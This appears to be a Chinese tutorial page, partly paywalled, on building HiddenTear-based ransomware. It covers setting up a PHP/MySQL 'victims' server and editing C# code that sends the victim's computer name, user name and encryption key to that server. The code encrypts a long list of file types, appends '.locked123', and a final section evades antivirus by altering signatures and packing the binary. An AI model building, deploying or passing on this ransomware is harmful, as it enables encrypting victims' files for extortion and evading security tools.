一、环境准备:

# web服务器。可用宝塔或者phpstudy搭建
#用于接收加密后服务器发来的秘钥等信息
PHP7.4,mysql5.6
#C#程序编辑器:
vs2019

在mysql中新建一个数据库victims,导入import.sql表结构。导入后如下:

将webserver里的文件放到网站目录下(文件在课程附件里)
当能访问该页面时,表示web服务器已搭建完成:

默认账号密码:test/test

二、配置修改

2.1 PHP连接mysql配置

connect_db.php文件里输入正确的数据库账号密码

隐藏内容
本内容需权限查看
  • 普通: 0.1金币
  • 会员: 0.1金币
  • 永久会员: 0.1金币
已有1人解锁查看

2.2 源码修改

源码由C#编写,所以安装vs2019时选择C#桌面开发

安装好后,选择.sl那文件打开项目

打开的项目后的界面如下:

主要修改项目里的from1.cs即可。其中:
- 这条为web服务器地址,使用 HTTPS 连接以避免窃听。

string targetURL = "https://www.example.com/Server/write.php"
  • 该脚本会把变量拼接到上面的URL后,将 GET 参数写入数据库
string info = "?computer_name=" + computerName + "&userName=" + userName + "&password=" + password + "&allow=ransom";
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
  • 这里修改目标文件扩展名。默认列表:
var validExtensions = new[]{".txt", ".jar", ".exe", ".dat", ".contact" , ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd" , ".pdf" , ".dll" , ".c" , ".cs", ".mp3" , ".mp4", ".f3d" , ".dwg" , ".cpp" , ".zip" , ".rar" , ".mov" , ".rtf" , ".bmp" , ".mkv" , ".avi" , ".apk" , ".lnk" , ".iso", ".7-zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj" , ".pdb", ".ico" , ".pas" , ".db" ,  ".torrent" };
  • 请不要添加 .INI 扩展名,因为与这些文件冲突会使您的脚本崩溃。
  • 在此重新上传中,有一个函数在将密码发送到数据库之前等待互联网连接:
//check for internet connection
public static bool CheckForInternetConnection()
{
    try
    {
        using (var client = new WebClient())
        {
            using (var stream = client.OpenRead("https://www.google.com"))
            {
                return true;
            }
        }
    }
    catch
    {
        return false;
    }
}
  • 修改加密后的扩展名:
System.IO.File.Move(file, file + ".locked123");
  • 在这里判断是否联网:
using (var stream = client.OpenRead("https://www.bing.com"))

生成可执行的EXE文件

在项目上右键--生成解决方案

此时会在项目的bin目录下生成一个exe文件

解密程序修改

解密程序路径和文件和加密文件类似,主要注意解密的文件后缀以及扫描的目录。文件已修改好,源码在本目录下
在编辑器vs2019上的这个位置点右键--生成解决方案

免杀

生成的程序会被杀软识别

打开editor二进制查看工具,将里面的hidden_tear改成其他字符,避免特征被识别

image-20220119203929696

打开safengine shielden工具,一键加壳,混淆病毒的行为

image-20220119204719537

运行程序,文件被加密

image-20220119205321496

访问WEB服务器,可看到发来的解密密码

image-20220126190715662

运行解密程序,输入密钥即可解密

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。